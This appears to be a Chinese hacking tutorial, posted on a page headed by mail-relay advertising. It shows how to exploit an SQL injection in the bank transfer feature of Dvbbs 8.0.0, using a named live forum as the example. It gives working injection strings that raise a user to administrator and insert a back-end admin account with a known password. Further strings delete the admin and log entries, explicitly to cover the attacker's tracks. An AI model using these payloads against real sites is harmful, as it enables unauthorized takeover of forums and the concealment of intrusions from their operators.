海外邮件中继，海外退信中继，美国高速VPS，不限流量VPN，邮局维护和管理，邮件网关，EMOS邮件中继，POSTFIX邮件中继，Winwebmail邮件中继,Winmail邮件中继,DBMail邮件中继,JDMail邮件中继,Exchange邮件中继,MDaemon邮件中继 淘宝店：http://shantan.taobao.com 云邮科技官网：www.yunrelay.com

【字体设置：大 中 小】
今天给大家讲的是利用Powered By Dvbbs Version 8.0.0
的银行插件漏动直达后台权限...
好了.我们现在开始
大家看下这个站  http://www.fifabbs.com.cn/index.html   做的还不错~~
我已经通知管理员修补了的哈~~~大家都别来这里了啊
好了 我们先注册..我注册好了 hackycz   等级：注册用户
来到 互动的社区银行~~

看转帐这里，我们先存点进去　　　　v 转账√ 就是可以转了，我们用的就是这个转帐
这个是提升为前台管理员的代码


test1';update/**/Dv_User/**/set/**/UserGroupID=1/**/where[UserName]='hackycz';--

会提升没有这个人哈，我们重新登陆下
是不是管理   这个有了   前台有了，不过没有什么用，我们要提升后台..我们回到银行
哪个地方还是转帐
输入我们的后台代码

密码我们要用MD5加密的，我随便写个
密码要用MD5加密的，我随便生成个 c7e715b2f1c9bc30密码就是258369   .待会工具打包哈~~
我们可以输代码了 都知道把

test1';Insert into Dv_admin(Password,Username,Adduser,Flag) values('c7e715b2f1c9bc30','hackycz','hackycz','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37');--

还是这个提示 
好，我们来到后台~~
试试能不能进去~~密码就是258369

接下来要做什么就你们自己发挥了.我 重点 说的是要擦干净我们留下的痕迹

这里有2段代码
删除后台管理员日志用户名
test1';DELETE FROM dv_admin WHERE username='hackycz';--
test1';DELETE FROM dv_log WHERE l_username='hackycz';--
我们再看看能不能进后台 
您输入的用户名和密码不正确或者您不是系统管理员。请<a href=admin_login.asp>重新输入</a>您的密码。返回后请刷新登录页面后重新输入正确的信息。 
呵呵，日志都清楚了   我们接下来
前台用户变为普通用户：我们所有的操作都在转帐里面完成的
test1';update/**/Dv_User/**/set/**/UserGroupID=9/**/where[UserName]='hackycz';--

好，重新登陆 看，是不是没有了啊
呵呵，好了

发表评论 - 不要忘了输入验证码哦！
作者：	用户：  密码：  我要注册 验证码：  为防止广告注册机程序,验证码不会自动显示,请点击此处显示或者(刷新)验证码!
评论： 禁止表情 禁止UBB 禁止图片 识别链接 识别关键字 确定发布？	最多可以输入200个字,目前你已经输入了0个字;你今日还可以发表10条评论!